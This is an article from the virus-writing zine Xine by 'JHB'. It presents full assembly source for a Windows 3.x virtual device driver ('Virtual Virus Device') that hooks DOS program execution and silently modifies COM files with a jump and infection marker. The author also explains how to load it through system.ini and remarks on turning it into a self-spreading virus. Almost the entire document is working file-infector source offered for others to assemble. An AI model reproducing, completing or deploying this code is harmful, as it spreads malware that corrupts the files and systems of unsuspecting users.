Copy Link
Add to Bookmark
Report
xine-1.006
/-----------------------------\
| Xine - issue #1 - Phile 006 |
\-----------------------------/
JHB presents:
infections by VxD
Well yes just as tsr's are to dos as VxD's to windows they offer an
amazing power and most probaly 90 percent will never know a VxD has been
added. This example shows how a VxD can modify com files and do it fast.
To make a true virus you would need to add a method to get the vxd in
memory. Infecting a command file and hooking the int 2f you can watch
and wait till windows yells out "hey Look out I am loading" at this time
you can make the vxd tell windows to load it. Another I feel may be easier
is to modifiy the system.ini to load it. But those are otherbridges to
cross...
;well lets be honest I use a source code as a frame to build this
;example, I did make the int 21 hook and the other stuff but thats
;just modified virus ideas from regular dos virii.
;to test just ad the line in the system.ini in the
;[386Enh]
;device=vvmd.386
;oh yea you need the masm5.1 and the device driver kit for windows3.X
;to assembly this if any one finds another way to assembly this please
;let me know.
;
;************************************************************************
TITLE VVD.ASM - Virtual Virus Device
;
;
;problem if ifshlp is loaded in the config.sys windows
;refuse to loads no error just returns to the c:\ only happen on one
;system not sure why
;
;************************************************************************
.386p
;************************************************************************
; I N C L U D E S
;************************************************************************
.XLIST
INCLUDE VMM.Inc
.LIST
;************************************************************************
; V I R T U A L D E V I C E D E C L A R A T I O N
;************************************************************************
Declare_Virtual_Device VVD, 3, 0, VVD_Control, TSRLoad_Device_ID, \
Undefined_Init_Order, ,
;************************************************************************
; I N I T I A L I Z A T I O N D A T A
;************************************************************************
VxD_DATA_SEG
pFn dd ?
VVD_RW_BUFF db 32h dup (0)
SysFile db "WIN.COM"
db 9 dup (0)
SysFileLen dw 8
hFILE DW ?
NEW_JMP DB 0E9H
Fsize DW ?
MARKER DB "V"
V_HOST db 0c7h, 06, 00, 01 ;MOV WORD PTR [100],
FIRST_WORD DW ? ;
DB 0C7H, 06, 02, 01 ;MOV WORD PTR [102],
SECOND_WORD DW ? ;
DB 068H, 00, 01 ;PUSH 0100
DB 0C3H ;RET
SIZE_V DW 0010H
VxD_DATA_ENDS
;************************************************************************
; R E A L M O D E I N I T I A L I Z A T I O N
;************************************************************************
VxD_REAL_INIT_SEG
BeginProc VVD_Real_Mode_Init
xor bx, bx ;nothing to do here
xor si, si ;except tell windows that
mov ax, Device_Load_Ok ;everything's ok
ret
EndProc VVD_Real_Mode_Init
VxD_REAL_INIT_ENDS
;*************************************************************************
; D E V I C E C O N T R O L P R O C E D U R E
;*************************************************************************
VxD_CODE_SEG
BeginProc VVD_Control
Control_Dispatch Device_Init, VVD_Device_Init
Control_Dispatch Init_Complete, VVD_Init_Complete
clc ; Ignore other control calls
ret
EndProc VVD_Control
VxD_CODE_ENDS
;*************************************************************************
; I N I T I A L I Z A T I O N C O D E
;*************************************************************************
VxD_ICODE_SEG
BeginProc VVD_Device_Init
mov eax,21H ;hook V86 int 21 handler
mov esi,OFFSET32 int_21handler
VMMcall Hook_V86_Int_Chain
clc ;say everything's clear
ret
EndProc VVD_Device_Init
BeginProc VVD_Init_Complete
clc ;say everything's clear
ret
EndProc VVD_Init_Complete
VxD_ICODE_ENDS
VxD_CODE_SEG
;*************************************************************************
; V86 I N T E R R U P T H A N D L E R S
;*************************************************************************
;*************************************************************************
;
; int_21handler
;
; DESCRIPTON: aTTEMPTS TO DETERMINE IF THE FILE IS A COM FILE IF SO
; ADD SOME MARKER AT THE END
; pass that point the com file is modified to
; jmp to the end then return after restoring the host
;
;
;=========================================================================
;NOTE IT APPEARS THAT ON ENTRY TO HERE EBP -> TO THE CRS (REGS STRUCTURE)
;WHILE EBX -> THE VM HANDLE
;NOTE SURE IF THE EBX IS A POINTER BUT i AM ASSUMING IT IS AT THIS TIME
;TO MAKE LIFE EASIER
;SEEMS MY GUESS IS WRONG
;
;The system calls the procedure as follows:
;
; mov eax, Interrupt ; number of interrupt hooked
; mov ebx, VM ; current VM handle
; mov ebp, OFFSET32 crs ; points to a Client_Reg_Struc
; call [HookProc]
BeginProc int_21handler
cmp [ebp.Client_AX],4b00h ;the exec call
jne REFLECT_21
Push_Client_State ;RESTORES THE CLIENT_IP_REG AND CS
VMMcall Begin_Nest_Exec ;RESTORES THE CLIENT REGS
movzx edx, [ebp.Client_DS] ; get offset to file name
shl edx, 4
movzx eax, [ebp.Client_DX]
add edx, eax
add edx, [ebx.CB_High_Linear]
mov [pFn], edx
; if win.com do not infect
push edi
mov edi, edx ; file name
mov ecx, 128
mov al, 0
repne scasb
dec edi
i21_90: dec edi
cmp byte ptr [edi], '\'
je short i21_100
cmp byte ptr [edi], '/'
je short i21_100
cmp byte ptr [edi], ':'
je short i21_100
cmp edi, edx
jb short i21_100
jmp short i21_90
i21_100: inc edi ; see if they match
mov esi, offset32 [SysFile]
movzx ecx, [SysFileLen]
repe cmpsb
pop edi
jz EXIT_I21 ; win.com do not play with
mov eax, 3D22h ; open file
VxDint 21h
jnc file_open
jmp EXIT_I21 ; error on open
file_open:
MOV word ptr [hFile],AX ;YEA OLD SAVE FILE
MOV EBX,EAX ;HANDLE
mov eax, 3F00h ; read MZ
mov ecx, 2 ;assume if not MZ
lea edx, FIRST_WORD ;its a com file
VxDint 21h ;
jc EXIT_I21 ;
cmp word ptr [FIRST_WORD], 5A4Dh ;
je close_EXIT_I21 ;
mov eax, 3F00h ; read next two bytes
mov ecx, 2 ;assume if not MZ
lea edx, SECOND_WORD ;its a com file
VxDint 21h ;
jc EXIT_I21 ;
cmp BYTE ptr [SECOND_WORD+1],"V" ;
je close_EXIT_I21 ;
mov eax, 4202h ; seek to end
xor ecx, ecx
mov edx, ecx
VxDint 21h
jc close_EXIT_I21
CMP DX,0 ;FILE IS TOO BIG
JNE close_EXIT_I21 ;GET OUT OF HERE
DEC EAX ;adjust the file size
DEC EAX ;for the jmp
DEC EAX ;
MOV [Fsize],AX ;SAVE THE FILE_SIZE
MOV EAX,4000H ;WRITE THE V_HOST
MOV ECX, 10H ;
lea EDX, V_HOST ;
VxDint 21h ;
mov eax, 4200h ; seek to end
xor ecx, ecx
mov edx, ecx
VxDint 21h
jc close_EXIT_I21
MOV EAX,4000H ;WRITE THE
MOV ECX, 4 ;NEW JMP
lea EDX, NEW_JMP ;
VxDint 21h ;
close_EXIT_I21:
mov bx, [hFile] ; close file
mov eax, 3E00h
VxDint 21h
EXIT_I21:
VMMcall End_Nest_Exec ;RESTORES THE CLIENT_IP_REG AND CS
Pop_Client_State ;RESTORES THE CLIENT REGS
REFLECT_21: ;reflect interrupt to next VxD or to V86 handler
stc
ret
EndProc int_21handler
VxD_CODE_ENDS
END VVD_Real_Mode_Init
